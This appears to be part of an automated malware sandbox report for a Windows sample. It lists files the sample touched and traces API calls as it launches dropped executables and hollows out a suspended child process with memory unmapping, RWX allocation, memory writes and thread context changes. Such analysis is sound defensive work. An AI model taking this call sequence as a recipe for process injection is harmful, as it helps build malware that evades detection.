file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file C:\Windows\Prefetch\WERMGR.EXE-0F2AC88C.pf
file C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-4366A668.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file C:\Windows\Prefetch\AgAppLaunch.db
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\syncUpd[1].exe
file C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file c:\Windows\Temp\TS_7FC6.tmp
file C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn
file C:\Windows\Prefetch\AgGlGlobalHistory.db
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[4].htm
file C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\invalidcert[1]
file C:\Windows\Prefetch\DLLHOST.EXE-97F6A314.pf
file C:\Users\test22\AppData\Local\Temp\UserInfoSetup(201804051522349E8).log
file c:\Windows\Temp\TS_88E1.tmp
file C:\Users\test22\AppData\Local\Temp\RD25B7.tmp
file C:\Windows\Prefetch\JAVAWS.EXE-FE17358E.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\554576[1].htm
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\getLoginStatus[2].nhn
file C:\Windows\Prefetch\ELEVATION_SERVICE.EXE-9F359A74.pf
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b42239df19ff4df68f076.exe
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-B95715F5.pf
Process injection Process 2192 resumed a thread in remote process 2364
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000080
suspend_count: 1
process_identifier: 2364
1 0 0
file C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

 thread_handle: 0x00000154
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

 thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

 thread_handle: 0x00000220
suspend_count: 1
process_identifier: 1704
1 0 0

CreateProcessInternalW

 thread_identifier: 2100
thread_handle: 0x000003b0
process_identifier: 2096
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003b8
1 1 0

NtResumeThread

 thread_handle: 0x00000358
suspend_count: 1
process_identifier: 1704
1 0 0

CreateProcessInternalW

 thread_identifier: 2144
thread_handle: 0x000003b8
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d0
1 1 0

NtResumeThread

 thread_handle: 0x000003a4
suspend_count: 1
process_identifier: 1704
1 0 0

CreateProcessInternalW

 thread_identifier: 2196
thread_handle: 0x000003c0
process_identifier: 2192
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\toolspub2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003e8
1 1 0

CreateProcessInternalW

 thread_identifier: 2264
thread_handle: 0x000001ec
process_identifier: 2260
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
filepath_r:
stack_pivoted: 0
creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE)
inherit_handles: 0
process_handle: 0x000001f0
1 1 0

CreateProcessInternalW

 thread_identifier: 2516
thread_handle: 0x000001e0
process_identifier: 2512
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
filepath_r:
stack_pivoted: 0
creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE)
inherit_handles: 0
process_handle: 0x000001e4
1 1 0

CreateProcessInternalW

 thread_identifier: 2368
thread_handle: 0x00000080
process_identifier: 2364
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\toolspub2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000084
1 1 0

NtGetContextThread

 thread_handle: 0x00000080
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 2364
process_handle: 0x00000084
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2364
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000084
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2364
process_handle: 0x00000084
1 1 0

NtSetContextThread

 registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000080
process_identifier: 2364
1 0 0

NtResumeThread

 thread_handle: 0x00000080
suspend_count: 1
process_identifier: 2364
1 0 0

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2260
1 0 0

NtResumeThread

 thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2260
1 0 0

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

NtResumeThread

 thread_handle: 0x0000013c
suspend_count: 1
process_identifier: 2260
1 0 0

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

NtResumeThread

 thread_handle: 0x0000024c
suspend_count: 1
process_identifier: 2260
1 0 0

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0